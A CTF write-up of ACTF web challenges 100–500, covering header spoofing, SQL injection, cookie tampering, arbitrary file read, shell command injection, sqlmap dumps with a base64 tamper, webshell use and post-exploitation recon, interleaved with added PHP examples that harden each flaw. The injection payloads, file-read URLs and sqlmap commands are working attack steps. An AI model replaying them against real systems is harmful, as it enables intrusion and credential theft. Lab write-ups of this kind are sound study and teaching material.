web

web100: The road to the flag

Step 1: http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!
Step 2: Using a FireFox add-on, set the X-Forwarded-For field in the Request Header to 127.0.0.1
Here is your flag: ACTF{I_love_H4ck_and_I_love_F4ck}
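Step 2 works because X-Forwarded-For is a header any client can write, so a check of the form "X-Forwarded-For equals 127.0.0.1" (which the bypass implies the challenge used; the page does not show its source, so that is an assumption) is spoofable from anywhere. The following is an added example, not code from the challenge: it shows that weak check beside a version that starts from the TCP peer address and only consults X-Forwarded-For when the request arrived through one of our own reverse proxies (the proxy address list is constructed).

```php
<?php
// Added example, not the web100 source. Assumption: the challenge compared
// X-Forwarded-For with 127.0.0.1, which is why Step 2's header spoof worked.

// Weak: trusts a client-controlled header, so "local only" means nothing.
function isLocalWeak(array $server): bool {
    return ($server['HTTP_X_FORWARDED_FOR'] ?? '') === '127.0.0.1';
}

// Constructed list of our own reverse proxies; only they may speak for the client.
const TRUSTED_PROXIES = ['10.0.0.5'];

function clientAddress(array $server): string {
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (in_array($peer, TRUSTED_PROXIES, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // A proxy appends the address it saw as the right-most hop, so that entry
        // is the one our proxy wrote; left-most entries may come from the client.
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $candidate = end($hops);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    // Direct connections: the socket peer is the only address we believe.
    return $peer;
}

function isLocal(array $server): bool {
    return clientAddress($server) === '127.0.0.1';
}

// Constructed requests: a remote client spoofing the header, and a genuine
// loopback request relayed by the trusted proxy.
$spoofed  = ['REMOTE_ADDR' => '203.0.113.9', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1'];
$viaProxy = ['REMOTE_ADDR' => '10.0.0.5',    'HTTP_X_FORWARDED_FOR' => '127.0.0.1'];

echo 'weak check, spoofed:   ', var_export(isLocalWeak($spoofed), true), "\n";
echo 'hardened, spoofed:     ', var_export(isLocal($spoofed), true), "\n";
echo 'hardened, via proxy:   ', var_export(isLocal($viaProxy), true), "\n";
```

The hardened check rejects the spoofed request and still recognises the relayed loopback one; if the application is not behind a proxy at all, the TRUSTED_PROXIES list should simply be empty and REMOTE_ADDR used directly.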

web200: The annoying administrator

http://218.2.197.236:2005/web200/index.php is a form login page; the challenge says the flag is in the administrator's hands.
POST data: name=admin%27+or+1%3D1+or+%27&pass=admin
Hint: flag is in ae6032eeeb5cedc1555940983435335b.php; visiting that page says "key not here".
The response header contains realkeyisin: beda47ac34562108ee149767c61cb0ec.php; visiting that page says only admin can see it.
It felt like I had to submit something identifying myself as admin, so I sent the request with Cookie: admin=1.
flag: ACTF{I_donot_need_sex_life_fxxks_me_everyday}
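Two separate weaknesses are used above: the login query accepts `admin' or 1=1 or '` as SQL rather than as a user name, and the admin role is read from a cookie the client can set. The page does not show the web200 source, so the following is an added example rather than the challenge's code; it assumes the original concatenated the user name into its query and trusted the `admin` cookie, and closes both. The same bound-parameter rule covers web400 below, where the `password` field is base64-decoded before use: decoding is not sanitisation, and the decoded value must still go in as a parameter.

```php
<?php
// Added example, not the web200 source (the page does not show it). It assumes
// the original built the login query by string concatenation and took the admin
// role from a client cookie; both are replaced here.

function login(PDO $db, string $name, string $pass): ?array {
    // Bound parameter: the quote in admin' or 1=1 or ' is data, not SQL syntax.
    $stmt = $db->prepare('SELECT name, pass_hash, is_admin FROM users WHERE name = ?');
    $stmt->execute([$name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['pass_hash'])) {
        return null;
    }
    return $row;
}

// The role lives in the server-side session written at login time; a cookie the
// client can edit (admin=1) is never consulted.
function isAdmin(array $session): bool {
    return !empty($session['is_admin']);
}

// Constructed in-memory database holding a single admin account.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (name TEXT PRIMARY KEY, pass_hash TEXT, is_admin INTEGER)');
$ins = $db->prepare('INSERT INTO users VALUES (?, ?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT), 1]);

$session = [];
// The decoded web200 payload is looked up as a literal user name and matches nothing.
if (login($db, "admin' or 1=1 or '", 'admin') === null) {
    echo "bypass attempt rejected\n";
}
// Only a real credential sets the role, and it is set server-side.
if (($user = login($db, 'admin', 'correct horse')) !== null) {
    $session['is_admin'] = (bool) $user['is_admin'];
}
echo isAdmin($session) ? "admin session\n" : "ordinary session\n";
```

In a real deployment `$session` is `$_SESSION` after `session_start()`; the point is that the browser only ever holds an opaque session id, never the role itself.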

web300: Meow meow meow meow

http://218.2.197.236:2001/login.php
I love you.And you?Then hack me please.
On the homepage at http://218.2.197.236:2001/,
About This Blog
This doubi web blog layout is provided by ./bc
http://218.2.197.236:2001/bc/
http://218.2.197.236:2001/download/doWnlOad.php?uuu=./doWnlOad.php gives arbitrary file read; its source:

<?php
$url=$_GET['uuu'];
$url=str_replace("..","",$url);   // only strips "..": an absolute path passes through untouched
$file = fopen("$url", "r") or exit("Unable to open file!");
//Output a line of the file until the end is reached
while(!feof($file)) {
    echo fgets($file)."\n";
}
fclose($file);
?>
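The filter above removes `..` and nothing else, which is why an absolute path such as /etc/passwd is read without trouble in the next step. As an added example (not the challenge's code), here is a download handler that keeps reads inside one fixed directory: it discards any directory component the client sent, allows only a conservative file-name alphabet, and then checks the canonicalised path against the canonicalised base directory. The directory name is an assumption for the example.

```php
<?php
// Added example, not the challenge's doWnlOad.php. Assumption: downloadable files
// live in a directory named DOWNLOAD_DIR (constructed name).
const DOWNLOAD_DIR = __DIR__ . '/files';

function resolveDownload(string $requested): ?string {
    // 1. Keep only the file name; "./x", "/etc/x" and "a/../x" all reduce to the last component.
    $name = basename($requested);
    // 2. Allow a conservative character set so names like "c0nfIg.php" pass and odd bytes do not.
    if (!preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $name)) {
        return null;
    }
    // 3. realpath() resolves symlinks as well as ".." segments; the result must stay
    //    under the base directory, so a symlink planted inside it cannot point out.
    $base = realpath(DOWNLOAD_DIR);
    $path = realpath(DOWNLOAD_DIR . '/' . $name);
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$path = resolveDownload($_GET['uuu'] ?? '');
if ($path === null) {
    http_response_code(404);
    exit('No such file');
}
// Serve as a download rather than echoing into the page, so PHP sources are not rendered.
header('Content-Type: application/octet-stream');
readfile($path);
```

Step 3 is the one that matters when the file list is not fixed in advance; where it is, an explicit whitelist of names is simpler still and avoids touching the file system with user input at all.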

http://218.2.197.236:2001/download/doWnlOad.php?uuu=/etc/passwd
HINT:x:500:500::/usr/share/ngInx/html:/bin/bash
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html
Remembered that flirty login.php page that invited you to hack her, so I read that one too:

<?php
header("Content-type:text/html; charset=GB2312");
$uid=$_GET["gongwan"];
if($fd=popen("/heiheihei/bin/online_user -f ".$uid, "r"))   # look here hehehe, there is a command execution vulnerability
{
    $content=fread($fd, 1024);
    fclose($fd);
}

$array=explode("\t",$content);

if($array[3]==0)
{
    exit("I love you.And you?Then hack me please.");
}

if($_SERVER["REMOTE_ADDR"] != $array[3])
{
    exit();
}
?>
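The `gongwan` parameter is concatenated straight into a shell command line, so shell metacharacters in it (the `||` and `>` used in the next request) are interpreted by the shell. As an added example, not the challenge's code, the same lookup is shown with the argument validated and quoted; it assumes `online_user -f` takes a numeric id, as the `gongwan=22222` request suggests.

```php
<?php
// Added example, not the challenge's login.php. Assumption: online_user takes a
// plain numeric user id (the page's gongwan=22222 suggests it).

function onlineUserRecord(string $uid): ?string {
    // Reject anything that is not a short decimal id before it gets near a shell.
    if (!ctype_digit($uid) || strlen($uid) > 10) {
        return null;
    }
    // escapeshellarg() single-quotes the value, so "||", ">" and friends are
    // passed to online_user literally instead of being parsed by the shell.
    $cmd = '/heiheihei/bin/online_user -f ' . escapeshellarg($uid);
    $fd = popen($cmd, 'r');
    if ($fd === false) {
        return null;
    }
    $content = fread($fd, 1024);
    pclose($fd);   // handles from popen() are closed with pclose(), which also reaps the child
    return $content === false ? null : $content;
}

$content = onlineUserRecord($_GET['gongwan'] ?? '');
if ($content === null) {
    exit('invalid user');
}
$array = explode("\t", $content);
// Guard the index too: the original reads $array[3] even when the command produced nothing.
if (!isset($array[3]) || $array[3] == 0) {
    exit('I love you.And you?Then hack me please.');
}
if ($_SERVER['REMOTE_ADDR'] != $array[3]) {
    exit();
}
```

The validation line does most of the work; `escapeshellarg()` is the second layer for the case where the allowed alphabet is ever widened. Either way the safest form is to avoid the shell entirely, for example by having `online_user` read the id from a database rather than from a command line.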

http://218.2.197.236:2001/login.php?gongwan=22222%20||%20ls%20%3E./tesst.txt
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html/tesst.txt
1
HiCode.cn.url
appleu0.txt
baka.mp3
bc
c0nfIg.php
contentslider.css
contentslider.js
dbiNf0.php
download
images
index.html
index.php
login.php
sb.txt
templatemo_style.css
tesst.txt
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html/dbiNf0.php

<?php
$salt = "abchefghjkmnpqrstuvwxyz0123456789"; //Salt hash to help secure your passwords, it's recommended that you change this to something unique and long
$captcha_salt = "abchefghjkmnpqrstuvwxyz123456789"; //create a new CAPTCHA Salt for this session

$dbhost = "localhost";
$dbname = "FLAG"; // mysql database name
$dbuser = "FLAG"; // mysql database username
$dbpass = "ACTF{300deeaSyFlAGmemeDa}"; // mysql database password
$pre = "onecms_"; // prefix for onecms tables
?>

web400: Gongwan-chan

So I kept digging:
http://218.2.197.236:2001/login.php?gongwan=22222 || ls -la /usr/share/ngInx>./tesst.txt
total 16
drwxr-xr-x. 4 root root 4096 Apr 4 21:30 .
drwxr-xr-x. 125 root root 4096 Apr 4 21:03 ..
dr-xr-xr-x 2 root root 4096 Apr 4 21:24 NOTE
drwxr-xrwx. 5 root root 4096 Apr 11 20:10 html
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/NOTE/note
Added the QQ of the girl I like today, so happy!
2018.3.22

aay gave me a low-privilege user on the machine next door. I'm really bad at Linux, but one of his pages seems to have a vulnerability, something like hejUbiAn.php.
2018.3.23

I used that vulnerability to write some data into the database, and hid the address of the one-line webshell I uploaded in there, hehehe.
2018.3.25

Let me note the password of that one-line webshell in that database so I don't forget it. But storing the password directly isn't safe~ so I'll only store that girl's QQ; the password is the lowercase pinyin of the girl's name. That way even if this diary leaks nobody can log in, hehehe.
2018.3.26

aay, the admin of the machine next door, never gives me root and never treats us to dinner; I've disliked him for a long time. I set up an alias on his server to trick him out of his root password; it should work within a few days.
2018.4.1

http://218.2.197.236:2003/hejUbiAn.php
On the page, Z3c= decodes to gw; when the password is wrong it says you are not gongwan.
Realized the injection point could be base64-encoded:
./sqlmap.py -u "http://218.2.197.236:2003/hejUbiAn.php" --data "password=gongwan" --tamper "base64encode.py" --dbs
./sqlmap.py -u "http://218.2.197.236:2003/hejUbiAn.php" --data "password=gongwan" --tamper "base64encode.py" -D "raw_admin" --dump
Database: raw_admin
Table: admin

+--------------------+-----------------+
| login              | password        |
+--------------------+-----------------+
| gw                 | gongwandaiskkkk |
| Fuckingluyuhao.php | 906239288       |
| luyuhaoxiaodaibi   | luyuhaodadaibi  |
+--------------------+-----------------+
A QQ number and a Baidu account, but neither seems to show a name.
Searched QQ Weibo:
http://t.qq.com/wangbiyun3709
Is that really the girl he has a crush on?
After connecting to the one-line webshell with a client, found the flag in /var/tmp/TheFlagIsHere.txt:
ro0T:F1aG:{YaNg_zi_j1angDa1skdaiyouKukuku} Is Ok

With the flag this obvious I'm not sure whether the challenge had been modified; the platform is closed now anyway.

web500: The deranged hacker

web300:218.2.197.236:2001
web400:218.2.197.236:2003

[/var/www/html/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:1F:58:C6  
          inet addr:172.17.3.2  Bcast:172.17.3.3  Mask:255.255.255.252
          inet6 addr: fe80::20c:29ff:fe1f:58c6/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1643665 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1655915 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:230218730 (219.5 MiB)  TX bytes:950011384 (906.0 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:348 errors:0 dropped:0 overruns:0 frame:0
          TX packets:348 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:35642 (34.8 KiB)  TX bytes:35642 (34.8 KiB)
          
[/var/www/html/]$ uname -a
Linux gamebox 2.6.32-431.11.2.el6.centos.plus.x86_64 #1 SMP Tue Mar 25 21:36:54 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

[/var/log/]$ arp -a
zhutou-centos-3-gw (172.17.3.1) at 00:0c:29:03:c2:e2 [ether] on eth0

(to be continued)